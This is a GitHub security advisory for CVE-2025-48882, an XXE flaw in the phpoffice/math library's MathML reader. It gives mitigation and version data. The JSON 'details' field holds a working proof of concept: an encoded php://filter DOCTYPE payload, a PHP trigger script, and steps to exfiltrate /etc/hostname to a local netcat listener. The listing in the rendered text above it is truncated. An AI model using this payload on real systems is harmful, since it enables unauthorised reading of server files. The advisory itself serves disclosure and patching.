ghsa-42hm-pq2f-3r7m
Vulnerability from github
Product: Math
Version: 0.2.0
CWE-ID: CWE-611: Improper Restriction of XML External Entity Reference
CVSS vector v.4.0: 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
CVSS vector v.3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Description: An attacker can create a special XML file, during which it processed, external entities are loaded, and it’s possible to read local server files.
Impact: Local server files reading
Vulnerable component: The loadXML function with the unsafe LIBXML_DTDLOAD flag, the MathML class
Exploitation conditions: The vulnerability applies only to reading a file in the MathML format.
Mitigation: If there is no option to refuse using the LIBXML_DTDLOAD flag, it’s recommended to filter external entities through the implementation of the custom external entity loader function.
Researcher: Aleksandr Zhurnakov (Positive Technologies)
Research
Zero-day vulnerability was discovered in the Math library in the detailed process of the XXE vulnerability research in PHP.
Loading XML data, using the standard libxml extension and the LIBXML_DTDLOAD flag without additional filtration, leads to XXE.
Below are steps to reproduce the vulnerability.
-
Preparation:
-
The payload was tested on the PHP versions >= 8.1.
- The composer manager is used to install the latest version of the Math library.
- PHP has to be configurated with Zlib support.
- The necessary requirements for the Math library must be installed.
-
The
netcatutility is used for demonstration exfiltration. -
Make
mathdirectory and then moving into it.mkdir math && cd math -
Install the latest actual version of the library (Figure 1). ``` composer require phpoffice/math ```` Figure 1. Installing the library
-
Create
poc.xmlfile (Listing 1):
Listing 1. Creating poc.xml
```
xml
<foo></foo>
``
5. Createmath.php` file (Listing 2):
Listing 2. Creating math.php
````
<?php
require_once "./vendor/autoload.php";
$reader = new \PhpOffice\Math\Reader\MathML();
$reader->read(
file_get_contents('poc.xml')
);
```
6. The payload (see the step 4) is set to exfiltrate the/etc/hostnamefile throughhttp://127.0.0.1:9999/, so the listening socket is launched at the9999` port (Figure 2)
Figure 2. Launching the listening socket
- Execute php-script via console:
php math.php
6 characters from the /etc/hostname file will be exfiltrated to the 9999 port in base64 format (Figure 3).
Figure 3. Characters exfiltration
Decode the received data from base64 removing the last M character (the payload feature) (Figure 4).
Figure 4. Data decoding
- By changing the payload, the remaining file can be received.
Credits
Aleksandr Zhurnakov (Positive Technologies)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.2.0"
},
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/math"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-48882"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-29T17:27:39Z",
"nvd_published_at": "2025-05-30T20:15:43Z",
"severity": "HIGH"
},
"details": "**Product:** Math\n**Version:** 0.2.0\n**CWE-ID:** CWE-611: Improper Restriction of XML External Entity Reference\n**CVSS vector v.4.0:** 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n**CVSS vector v.3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n**Description:** An attacker can create a special XML file, during which it processed, external entities are loaded, and it\u2019s possible to read local server files. \n**Impact:** Local server files reading\n**Vulnerable component:** The [`loadXML`](https://github.com/PHPOffice/Math/blob/c3ecbf35601e2a322bf2ddba48589d79ac827b92/src/Math/Reader/MathML.php#L38C9-L38C55) function with the unsafe [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag, the [`MathML`](https://github.com/PHPOffice/Math/blob/master/src/Math/Reader/MathML.php) class\n**Exploitation conditions:** The vulnerability applies only to reading a file in the `MathML` format.\n**Mitigation:** If there is no option to refuse using the [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag, it\u2019s recommended to filter external entities through the implementation of the [`custom external entity loader function`](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php).\n**Researcher: Aleksandr Zhurnakov (Positive Technologies)**\n\n## Research\nZero-day vulnerability was discovered in the [Math](https://github.com/PHPOffice/Math) library in the detailed process of the XXE vulnerability research in PHP.\nLoading XML data, using the standard [`libxml`](https://www.php.net/manual/en/book.libxml.php) extension and the [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag without additional filtration, leads to XXE.\n\nBelow are steps to reproduce the vulnerability.\n\n1. Preparation:\n\n- The payload was tested on the PHP versions \u003e= 8.1.\n- The [composer](https://getcomposer.org/) manager is used to install the latest version of the Math library.\n- PHP has to be configurated with [Zlib](https://www.php.net/manual/ru/book.zlib.php) support.\n- The necessary [requirements](https://github.com/PHPOffice/Math?tab=readme-ov-file#requirements) for the Math library must be installed.\n- The `netcat` utility is used for demonstration exfiltration.\n\n2. Make `math` directory and then moving into it.\n````\nmkdir math \u0026\u0026 cd math\n````\n\n3. Install the latest actual version of the library (Figure 1). \n```\ncomposer require phpoffice/math\n````\n_Figure 1. Installing the library_\n\u003cimg width=\"630\" alt=\"fig2\" src=\"https://github.com/user-attachments/assets/bb0c6781-4f5a-411c-970d-9402e652ad87\" /\u003e\n\n4. Create `poc.xml` file (Listing 1): \n\n_Listing 1. Creating `poc.xml`_\n```\nxml \n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e \u003c!DOCTYPE x SYSTEM \n\"php://filter/convert.base64-\ndecode/zlib.inflate/resource=data:,7Ztdb9owFIbv%2bRVZJ9armNjOZ2k7QUaL%2bRYO2nqFUn\nBFNQaMptP272cnNFuTsBbSskg1iATZzvGxn/ccX3A4fdfoecS7UsrK1A98hV5Rr9FVjlaz1UmlcnM7D9i\n6MlkufrB1AK79O2bqKltMllMWt96KL6ADwci7sJ4Yu0vr9/tlwKbqan27CPzrOXvevFGrbRvOGIseaCa7\nTAxok1x44xahXzQEcdKPKZPevap3RZw920I0VscWGLlU1efPsy0c5cbV1AoI7ZuOMCZW12nkcP9Q2%2bQ\nObBNmL6ajg8s6xJqmJTrq5NIArX6zVk8Zcwwt4fPuLvHnbeBSvpdIQ6g93MvUv3CHqKNrmtEW4EYmCr5g\nDT5QzyNWE4x6xO1/aqQmgMhGYgaVDFUnScKltbFnaJoKHRuHK0L1pIkuaYselMe9cPUqRmm5C51u00kkh\ny1S3aBougkl7e4d6RGaTYeSehdCjAG/O/p%2bYfKyQsoLmgdlmsFYQFDjh6GWJyGE0ZfMX08EZtwNTdAY\nud7nLcksnwppA2UnqpCzgyDo1QadAU3vLOQZ82EHMxAi0KVcq7rzas5xD6AQoeqkYkgk02abukkJ/z%2b\nNvkj%2bjUy16Ba5d/S8anhBLwt44EgGkoFkIBlIBpKBZCAZSAaSgWQgGUgGkoFkIBlIBpKBZCAZSAaSgW\nQgGUgGxWOwW2nF7kt%2by7/Kb3ag2GUTUgBvXAAxiKxt4Is3sB4WniVrOvhwzB0CXerg5GN9esGRQv7Rg\nQdMmMO9sIwtc/sIJUOCsY4ee7f7FIWu2Si4euKan8wg58nFsEIXxYGntgZqMog3Z2FrgPhgyzIOlsmijo\nwqwb0jyMqMoGEbarqdOpP/iqFISMkSVFG1Z5p8f3OK%2bxAZ7gClpgUPg70rq0T2RIkcup/0newQ7NbcU\nXv/DPl4LL/N7hdfn2dp07pmd8v79YSdVVgwqcyWd8HC/8aOzkunf6r%2b2c8bpSxK/6uPmlf%2br/nSny\nrHcduH99iqKiz7HwLxTLMgEM0QWUDjb3ji8NdHPslZmV%2bqR%2bfH56Xyxni1VGbV0m8=\" \n[]\u003e\u003cfoo\u003e\u003c/foo\u003e\n```\n5. Create `math.php` file (Listing 2): \n\n*Listing 2. Creating `math.php`*\n````\n\u003c?php\n require_once \"./vendor/autoload.php\";\n\n $reader = new \\PhpOffice\\Math\\Reader\\MathML();\n $reader-\u003eread(\n file_get_contents(\u0027poc.xml\u0027)\n );\n````\n6. The payload (see the step 4) is set to exfiltrate the `/etc/hostname` file through `http://127.0.0.1:9999/`, so the listening socket is launched at the `9999` port (Figure 2)\n\n_Figure 2. Launching the listening socket_\n\u003cimg width=\"550\" alt=\"fig2\" src=\"https://github.com/user-attachments/assets/6da5b966-70be-4e3e-9bde-c6baf4dfef34\" /\u003e\n\n7. Execute php-script via console: \n````\nphp math.php \n````\n\n6 characters from the `/etc/hostname` file will be exfiltrated to the `9999` port in base64 format (Figure 3). \n\n_Figure 3. Characters exfiltration_\n\u003cimg width=\"520\" alt=\"fig3\" src=\"https://github.com/user-attachments/assets/f0eae873-d156-442f-ab08-12dd94a8dbe9\" /\u003e\n\nDecode the received data from base64 removing the last `M` character (the payload feature) (Figure 4).\n\n*Figure 4. Data decoding*\n\u003cimg width=\"595\" alt=\"fig4\" src=\"https://github.com/user-attachments/assets/7a091a07-7856-41a0-b1bd-3d8009303ced\" /\u003e\n\n8. By changing the payload, the remaining file can be received. \n\n## Credits\nAleksandr Zhurnakov (Positive Technologies)",
"id": "GHSA-42hm-pq2f-3r7m",
"modified": "2025-05-30T21:42:11Z",
"published": "2025-05-29T17:27:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48882"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a"
},
{
"type": "PACKAGE",
"url": "https://github.com/PHPOffice/Math"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "PHPOffice Math allows XXE when processing an XML file in the MathML format "
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.